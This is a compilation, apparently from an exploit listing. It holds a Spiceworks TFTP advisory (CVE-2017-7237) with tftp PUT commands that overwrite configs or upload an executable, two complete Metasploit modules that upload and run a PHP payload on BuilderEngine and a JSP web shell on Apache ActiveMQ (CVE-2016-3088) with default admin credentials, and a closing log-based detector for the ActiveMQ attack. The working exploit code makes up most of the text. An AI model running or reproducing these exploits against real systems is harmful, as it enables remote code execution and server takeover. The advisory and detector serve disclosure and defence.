    Improper Access Control File Overwrite / Upload

    CVE Reference:
    ==============
    CVE-2017-7237

    Security Issue:
    ================
    The Spiceworks TFTP Server, as distributed with Spiceworks Inventory 7.5, allows remote
    attackers to access the Spiceworks "data\configurations" directory by leveraging the
    unauthenticated nature of the TFTP service for all clients who can reach UDP port 69. This
    allows remote attackers to overwrite files within the Spiceworks configurations directory
    if the targeted file name is known or guessed.

    Remote attackers who can reach UDP port 69 can also write/upload arbitrary files to
    "data\configurations". This can potentially become a Remote Code Execution vulnerability
    if, for example, an executable file (EXE, BAT) is dropped and later accessed and run by an
    unknowing Spiceworks user.

    References - released April 3, 2017:
    ====================================
    https://community.spiceworks.com/support/inventory/docs/network-config#security

    Proof:
    =======
    1) Install Spiceworks
    2) c:\>tftp -i VICTIM-IP PUT someconfig someconfig
    3) Original someconfig gets overwritten

    OR

    Arbitrary file upload
    c:\>tftp -i VICTIM-IP PUT Evil.exe Evil.exe

    Network Access:
    ===============
    Remote

    Severity:
    =========
    High

    Disclosure Timeline:
    ======================================================================
    Vendor Notification: March 13, 2017
    Sent vendor e.g. POC : March 23, 2017
    Request status : March 30, 2017
    Vendor reply: "We are still working on this" March 30, 2017
    Vendor reply: "Thanks for bringing this to our attention" and releases basic security note of issue on website : April 3, 2017
    April 5, 2017 : Public Disclosure

    [+] Disclaimer
    The information contained within this advisory is supplied "as-is" with no warranties or
    guarantees of fitness of use or otherwise. Permission is hereby granted for the
    redistribution of this advisory, provided that it is not altered except by reformatting it,
    and that due credit is given. Permission is explicitly given for insertion in vulnerability
    databases and similar, provided that due credit is given to the author. The author is not
    responsible for any misuse of the information contained herein and accepts no responsibility
    for any damage caused by the use or misuse of this information. The author prohibits any
    malicious use of security related information or exploits by the author or elsewhere.
    All content (c).
19. ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::FileDropper
      include Msf::Exploit::Remote::HttpClient

      def initialize(info={})
        super(update_info(info,
          'Name'        => "BuilderEngine Arbitrary File Upload Vulnerability and execution",
          'Description' => %q{
            This module exploits a vulnerability found in BuilderEngine 3.5.0 via elFinder 2.0.
            The jquery-file-upload plugin can be abused to upload a malicious file, which would
            result in arbitrary remote code execution under the context of the web server.
          },
          'License' => MSF_LICENSE,
          'Author'  => [
            'metanubix',    # PoC
            'Marco Rivoli'  # Metasploit
          ],
          'References' => [
            ['EDB', '40390']
          ],
          'Payload' => {
            'BadChars' => "\x00"
          },
          'DefaultOptions' => {
            'EXITFUNC' => 'thread'
          },
          'Platform' => ['php'],
          'Arch'     => ARCH_PHP,
          'Targets'  => [
            ['BuilderEngine 3.5.0', {}]
          ],
          'Privileged'     => false,
          'DisclosureDate' => "Sep 18 2016",
          'DefaultTarget'  => 0))

        register_options(
          [
            OptString.new('TARGETURI', [true, 'The base path to BuilderEngine', '/'])
          ])
      end

      def check
        uri = target_uri.path
        uri << '/' if uri[-1,1] != '/'
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(uri, 'themes/dashboard/assets/plugins/jquery-file-upload/server/php/')
        })
        if res && res.code == 200 && !res.body.blank?
          return Exploit::CheckCode::Appears
        else
          return Exploit::CheckCode::Safe
        end
      end

      def exploit
        uri = target_uri.path
        peer = "#{rhost}:#{rport}"
        php_pagename = rand_text_alpha(8 + rand(8)) + '.php'

        data = Rex::MIME::Message.new
        payload_encoded = Rex::Text.rand_text_alpha(1)
        payload_encoded << "<?php "
        payload_encoded << payload.encoded
        payload_encoded << " ?>\r\n"
        data.add_part(payload_encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")
        post_data = data.to_s

        res = send_request_cgi({
          'uri'    => normalize_uri(uri,'themes/dashboard/assets/plugins/jquery-file-upload/server/php/'),
          'method' => 'POST',
          'ctype'  => "multipart/form-data; boundary=#{data.bound}",
          'data'   => post_data
        })

        if res
          if res.code == 200 && res.body =~ /files|#{php_pagename}/
            print_good("Our payload is at: #{php_pagename}. Calling payload...")
            register_file_for_cleanup(php_pagename)
          else
            fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
          end
        else
          fail_with(Failure::Unknown, 'ERROR')
        end

        print_status("Calling payload...")
        send_request_cgi(
          'method' => 'GET',
          'uri'    => normalize_uri(uri,'files/', php_pagename)
        )
      end
    end
  20. Hacking

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::FileDropper

      def initialize(info = {})
        super(update_info(info,
          'Name'        => 'ActiveMQ web shell upload',
          'Description' => %q(
            The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote
            attackers to upload and execute arbitrary files via an HTTP PUT followed by an
            HTTP MOVE request.
          ),
          'Author' => [
            'Ian Anderson <andrsn84[at]gmail.com>',
            'Hillary Benson <1n7r1gu3[at]gmail.com>'
          ],
          'License'    => MSF_LICENSE,
          'References' => [
            [ 'CVE', '2016-3088' ],
            [ 'URL', 'http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt' ]
          ],
          'Privileged' => true,
          'Platform'   => %w{ java linux win },
          'Targets'    => [
            [ 'Java Universal', { 'Platform' => 'java', 'Arch' => ARCH_JAVA } ],
            [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 } ],
            [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ]
          ],
          'DisclosureDate' => "Jun 01 2016",
          'DefaultTarget'  => 0))

        register_options(
          [
            OptString.new('BasicAuthUser', [ true, 'The username to authenticate as', 'admin' ]),
            OptString.new('BasicAuthPass', [ true, 'The password for the specified username', 'admin' ]),
            OptString.new('JSP', [ false, 'JSP name to use, excluding the .jsp extension (default: random)', nil ]),
            OptString.new('AutoCleanup', [ false, 'Remove web shells after callback is received', 'true' ]),
            Opt::RPORT(8161)
          ])

        register_advanced_options(
          [
            OptString.new('UploadPath', [false, 'Custom directory into which web shells are uploaded', nil])
          ])
      end

      def jsp_text(payload_name)
        %{
          <%@ page import="java.io.*" %><%@ page import="java.net.*" %><%
          URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("./#{payload_name}.jar")).toURI().toURL()});
          Class c = cl.loadClass("metasploit.Payload");
          c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});
          %>}
      end

      def exploit
        jar_payload = payload.encoded_jar.pack
        payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8))
        host = "#{datastore['RHOST']}:#{datastore['RPORT']}"
        @url = datastore['SSL'] ? "https://#{host}" : "http://#{host}"
        paths = get_upload_paths
        paths.each do |path|
          if try_upload(path, jar_payload, payload_name)
            break handler if trigger_payload(payload_name)
            print_error('Unable to trigger payload')
          end
        end
      end

      def try_upload(path, jar_payload, payload_name)
        ['.jar', '.jsp'].each do |ext|
          file_name = payload_name + ext
          data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload
          move_headers = { 'Destination' => "#{@url}#{path}#{file_name}" }
          upload_uri = normalize_uri('fileserver', file_name)
          print_status("Uploading #{move_headers['Destination']}")
          register_files_for_cleanup "#{path}#{file_name}" if datastore['AutoCleanup'].casecmp('true')
          return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&
                                  send_request('MOVE', upload_uri, 204, 'headers' => move_headers)
          @trigger_resource = /webapps(.*)/.match(path)[1]
        end
        true
      end

      def get_upload_paths
        base_path = "#{get_install_path}/webapps"
        custom_path = datastore['UploadPath']
        return [normalize_uri(base_path, custom_path)] unless custom_path.nil?
        [
          "#{base_path}/api/",
          "#{base_path}/admin/"
        ]
      end

      def get_install_path
        properties_page = send_request('GET', "#{@url}/admin/test/systemProperties.jsp").body
        match = properties_page.tr("\n", '@').match(/activemq\.home<\/td>@\s*<td>([^@]+)<\/td>/)
        return match[1] unless match.nil?
      end

      def send_request(method, uri, expected_response = 200, opts = {})
        opts['headers'] ||= {}
        opts['headers']['Authorization'] = basic_auth(datastore['BasicAuthUser'], datastore['BasicAuthPass'])
        opts['headers']['Connection'] = 'close'
        r = send_request_cgi(
          {
            'method' => method,
            'uri'    => uri
          }.merge(opts)
        )
        return false if r.nil? || expected_response != r.code.to_i
        r
      end

      def trigger_payload(payload_name)
        send_request('POST', @url + @trigger_resource + payload_name + '.jsp')
      end

      def error_out
        print_error('Upload failed')
        @trigger_resource = nil
        false
      end
    end
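The module above abuses the ActiveMQ fileserver with a PUT to `/fileserver/<name>` followed by a MOVE of the same resource (CVE-2016-3088), and it expects HTTP 204 for both. As an added example, not part of the module or of ActiveMQ, the detection below correlates successful PUT and MOVE requests to `/fileserver/` from the same client in the broker's NCSA-style request log. The log lines are constructed for the example, and the names `parse_access_line` and `detect_fileserver_put_move` are assumptions.

```ruby
require 'time'

# NCSA / combined-log-format line; only the fields the detection needs are captured.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# Parses one request-log line into a hash, or returns nil for lines it cannot parse.
def parse_access_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  {
    ip: m[:ip],
    time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method],
    path: m[:path],
    status: m[:status].to_i
  }
end

# Returns one alert per (client, resource) where a 204 PUT to /fileserver/ was
# followed within +window+ seconds by a 204 MOVE of the same resource from the
# same client. A lone MOVE (no preceding PUT) is also reported, since the
# fileserver should never legitimately see WebDAV-style relocation requests.
def detect_fileserver_put_move(lines, window: 60)
  puts_seen = {}
  alerts = []
  lines.each do |line|
    ev = parse_access_line(line)
    next unless ev && ev[:path].start_with?('/fileserver/') && ev[:status] == 204
    key = [ev[:ip], ev[:path]]
    case ev[:method]
    when 'PUT'
      puts_seen[key] = ev[:time]
    when 'MOVE'
      t0 = puts_seen[key]
      if t0 && (ev[:time] - t0) <= window
        alerts << { ip: ev[:ip], resource: ev[:path], kind: :put_then_move,
                    seconds: (ev[:time] - t0).to_i }
      else
        alerts << { ip: ev[:ip], resource: ev[:path], kind: :lone_move, seconds: nil }
      end
    end
  end
  alerts
end

# Constructed sample log lines: one PUT/MOVE pair, one harmless GET, one PUT with no MOVE.
SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jun/2016:10:00:01 +0000] "PUT /fileserver/example.jsp HTTP/1.1" 204 0',
  '10.0.0.5 - - [01/Jun/2016:10:00:02 +0000] "MOVE /fileserver/example.jsp HTTP/1.1" 204 0',
  '10.0.0.9 - - [01/Jun/2016:10:00:03 +0000] "GET /admin/index.jsp HTTP/1.1" 200 512',
  '10.0.0.7 - - [01/Jun/2016:10:05:00 +0000] "PUT /fileserver/readme.txt HTTP/1.1" 204 0'
].freeze

if __FILE__ == $PROGRAM_NAME
  detect_fileserver_put_move(SAMPLE_LOG).each { |a| puts a.inspect }
end
```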